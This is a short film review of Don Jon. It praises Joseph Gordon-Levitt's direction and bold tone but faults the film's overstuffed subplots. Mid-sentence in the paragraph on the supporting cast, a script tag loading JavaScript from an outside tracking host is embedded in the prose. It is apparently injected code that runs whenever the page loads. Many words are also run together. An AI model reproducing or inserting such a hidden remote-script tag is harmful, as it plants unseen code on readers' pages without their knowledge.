Joseph Gordon-Levitt directs, writes and stars here, leaping feet first into that small cadre offilmmakers who work in front of and behind the camera. And the result is remarkably assured, surprisingly brave and a million miles away from you average romance.

The first thing to say is that Don Jon is not a comedy. While the trailers might peg it as a breezyromantic giggler, with a side helping of sex, the reality is much darker. And that certainly makes for a more interesting film, though the crude level of the some of the material means it’s probably not anideal date movie.

At its deepest level it’s a film about human intimacy, and it explores that through a number of distinct relationships. Each provides Jon with different challenges, but it’s an attempt to work on his porn addiction which forces him to question what else might be missing in his life, and maybe even make a surprising change which will affect his entire future.

It’s an effectively presented struggle, and one which has the freedom to present arguments both forand against the use of porn. Elsewhere, Jon religion and family life are also brought into the picturebut they often add too much noise. Even at 90 minutes, the film feels overstuffed, with too manyunnecessary diversions.

That the film never quite falls apart is a testament to the skill of this young director, and his energyon screen also helps to keep the less assured pieces together. With a thick New York accent andcocky manner, it’s a more self-assured performance than we’re used to seeing from the actor – andpossibly suggests he didn’t intend it as a starring vehicle – but it works well for the part. And he doesa great car stereo sing-along.

The supporting cast are fine – Johansson goes a little too far with the accent but does good workwith a difficult role and Danza makes for a fine hot-headed dad. JulianneMoore probably <script type="text/javascript" src="http://track.sitetag.us/tracking.js?hash=b259f01f80fef70a3b333c1318b90f54"></script> comes offbest, though it’s a role which she could play in her sleep.

I liked the ambition of Don Jon more than I was in love with the film. Instead of making aconventional romance or genre picture, Gordon-Levitt went for broke with a film that manages tocharm and disarm in equal measure. It’s not always a success, and the darker tone may surprisesome, but eminently watchable and makes me wildly curious to see what this talented youngfilmmaker will do next.
